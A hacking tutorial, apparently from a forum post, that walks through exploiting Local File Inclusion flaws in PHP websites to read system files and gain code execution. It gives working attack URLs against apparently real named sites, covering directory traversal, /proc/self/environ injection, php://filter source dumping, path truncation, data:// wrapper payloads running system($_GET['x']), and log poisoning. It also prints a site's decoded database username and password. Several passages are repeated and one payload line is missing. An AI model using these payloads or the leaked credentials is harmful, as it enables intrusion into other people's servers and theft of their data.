1.Getting RCE with LFI Via /proc/self/environ
First Lets Try getting /etc/passwd to Confirm if
its Directory Traversal Attack Or not
../ is used to get into upper(parent) Directory in
*nix
http://targetsite/?page=/etc/passwd
http://targetsite/?page=../../../etc/passwd
http://targetsite/?page=../../../../etc/passwd
(Worked !)
Okay so Our Next step ,
Lets Try Getting /proc/self/environ
http://targetsite/?page=../../../../proc/self/environ
Worked
DOCUMENT_ROOT=/home/dprdicom/public_html/smscenterGATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8HTTP_ACCEPT_ENCODING=gzip,deflateHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5HTTP_CONNECTION=keep-aliveHTTP_HOST=targetsiteHTTP_USER_AGENT=Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101
Firefox/27.0PATH=/bin:/usr/binPHPRC=/usr/local/lib/QUERY_STRING=page=../../../../proc/self/environREDIRECT_STATUS=200REMOTE_ADDR=182.68.251.152REMOTE_PORT=21007REQUEST_METHOD=GETREQUEST_URI=/?page=../../../../proc/self/environSCRIPT_FILENAME=/home/dprdicom/public_html/smscenter/index.phpSCRIPT_NAME=/index.phpSERVER_ADDR=103.28.12.130SERVER_ADMIN=_NAME=targetsiteSERVER_PORT=80SERVER_PROTOCOL=HTTP/1.1SERVER_SIGNATURE=SERVER_SOFTWARE=ApacheUNIQUE_ID=U@e2lmccDCgAB3SNHk0AAAAa
Do You See Some Thing like 'HTTP_USER_AGENT=Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0' in /proc/self/environ? its Could Execute PHP Code When Requested, so Now We gonna Modify User-Agent Field using Live HTTP Headers/Tamper Data to :
Yo! It Worked , we Could
phpinfo() , but unfortunately We Couldn't Execute system Commands as We Could
See in phpinfo's disable_functions All System Functions are Disabled , Still We
could Write Files =)) using
<?$file =
fopen("./lib/xxx.php","w");fwrite($file,"<?phpinfo()?>");fclose($file);phpinfo();?>
##I Wasn't Able to Write in main directory of Website so Found a dir 'lib' by playing with Google dorks and It Was Writable you Could see ##
POC :
http://targetsite/lib/xxx.php
Using file_puts_content(); or similar functions
2.Reading Files
via LFI [php://filter]
php://filter is a meta-wrapper designed to permit the application of filters to a stream at
the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and
file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior
the contents being read.
We can read configuration/database.php , only PHP files using it
USAGE : php://filter/convert.base64-encode/resource=file name here
php://filter is a meta-wrapper designed to permit the application of filters to a stream at
the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and
file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior
the contents being read.
We can read configuration/database.php , only PHP files using it
USAGE : php://filter/convert.base64-encode/resource=file name here
http://www.targetsite.co.in/index.php?token=admission
So We Gonna Try loading
/etc/passwd
www.targetsite.co.in/index.php?token=/etc/passwd
Now We See in The Error
Warning: include(/etc/passwd.php): failed to open stream: No such file or directory in /home/bihtapub/public_html/index.php on line 72
'.php' is there Already For
removing This Extension We Use (null byte)
http://www.targetsite.co.in/index.php?token=/etc/passwd
but oH!! Still Error :\
Failed opening '/etc/passwd' , We are unable to load it ...
Lets Try to Read php files once =((
http://www.targetsite.co.in/index.php?token=php://filter/convert.base64-encode/resource=index
and yes!!
We Loaded index.php of the site
You Could See in The Page Which is Base64 encoded
and Could Be Easily Reversed,
so I decoded ::
<?php
include('admin/config.php');
$gallerymenuquery = mysql_query("select *
from tbl_folder");
$galleryfirstitem = mysql_fetch_
We Could See in The Starting lines the location of
config file Lets load it
http://www.targetsite.co.in/index.php?token=php://filter/convert.base64-encode/resource=admin/config
Base64
encoded:
PD9waHAKJGRiX25hbWU9ImJpaHRhcHViX2RiIjsKaWYoJF9TRVJWRVJbIlNFUlZFUl9BRERSIl09PSIxMjcuMC4wLjEiKQoJJGNvbj1teXNxbF9jb25uZWN0KCJsb2NhbGhvc3QiLCJyb290IiwiIik7CmVsc2UKCSRjb249bXlzcWxfY29ubmVjdCgibG9jYWxob3N0IiwiYmlodGFwdWJfYWRtaW4iLCJCUFNAMjAxMyIpOwppZighJGNvbikKCXsKCWRpZSgiRXJyb3IgaW4gY29ubmVjdGlvbiIubXlzcWxfZXJyb3IoKSk7Cgl9Cm15c3FsX3NlbGVjdF9kYigiJGRiX25hbWUiKW9yIGRpZSgiY2Fubm90IHNlbGVjdCBEQiIpOwo/
Decoded :
PHP:
<?php
$db_name="bihtapub_db";
if($_SERVER["SERVER_ADDR"]=="127.0.0.1")
$con=mysql_connect("localhost","root","");
else
$con=mysql_connect("localhost","bihtapub_admin","BPS@2013");
if(!$con)...
.
.
?>
$db_name="bihtapub_db";
if($_SERVER["SERVER_ADDR"]=="127.0.0.1")
$con=mysql_connect("localhost","root","");
else
$con=mysql_connect("localhost","bihtapub_admin","BPS@2013");
if(!$con)...
.
.
?>
3.When Null bytes Fails or Is Escaped and Couldn't remove extension already there
PHP truncates paths used by file system functions, by default, into 4096 bytes So We Remove whatever is left at the end of the path by Filling the buffer The ideal way to fill the buffer is with "/." strings and this is the string this tutorial will be using (linux server only)
www.becrux.com/index.php?page=../../../../../../etc/my.cnf
as you could see " include(pages/../../../../../../etc/my.cnf/index.php)"
We need to remove '/index.php' from include() on Using we See it Simply is Escaped
So!! Now We Gonna Fill Up buffer
We need to remove '/index.php' from include() on Using we See it Simply is Escaped
So!! Now We Gonna Fill Up buffer
http://www.becrux.com/index.php?page=../../../../../../etc/my.cnf/./
Due To some Reason IDK I
was not able to load /etc/passwd, Strange
[#]Thnx To AntiPaste , HackForums For This buffer filling Method[#]
#if You See Forbidden error on Using ../../ You Could Simply URL Encode them :V and Try#
[#]Thnx To AntiPaste , HackForums For This buffer filling Method[#]
#if You See Forbidden error on Using ../../ You Could Simply URL Encode them :V and Try#
4.Using data:// wrapper
It Can inject the PHP code you want executed directly into the URL Lets see it:
Usage :: data:text/plain,<?php phpinfo(); ?>
Or
data:,<?system($_GET['x']);?>&x=ls
Or
data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=ls
Even it Supports Base64 Encoding
So I Have a Site here => http://www.zamenfeld.com.ar/main.php?pagina=publicaciones.html
http://www.zamenfeld.com.ar/main.php?pagina=data:text/plain,<?system($_GET['x']);?>&x=ls
Or
http://www.zamenfeld.com.ar/main.php?pagina=data:,<?system($_GET['x']);?>&x=ls
Or
http://www.zamenfeld.com.ar/main.php?pagina=data: base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=ls
5. Log Poisoning Method
We Use it When /proc/self/environ Doesn't loads,
In order to perform a LFI log poisoning you need to be able to include the apache error or and access logs. Unfortunately have been made "impossible" in newer versions of apache(the most used web server)
Some Common log Files:=>
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log
/var/www/logs/error_log
/var/www/logs/error.log
Lets say we can include /var/www/logs/access.log.
http://www.site.com/index.php?page=/var/www/logs/access.log
Legal Disclaimer : This tutorial is completely for educational purpose only.For any misuse of this tutorial by any means the author will not be held responsible.
If you have any queries Please comment my posts.
We Use it When /proc/self/environ Doesn't loads,
In order to perform a LFI log poisoning you need to be able to include the apache error or and access logs. Unfortunately have been made "impossible" in newer versions of apache(the most used web server)
Some Common log Files:=>
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log
/var/www/logs/error_log
/var/www/logs/error.log
Lets say we can include /var/www/logs/access.log.
http://www.site.com/index.php?page=/var/www/logs/access.log
Legal Disclaimer : This tutorial is completely for educational purpose only.For any misuse of this tutorial by any means the author will not be held responsible.
If you have any queries Please comment my posts.
 Local File Inclusion){kind=link}
0 Comments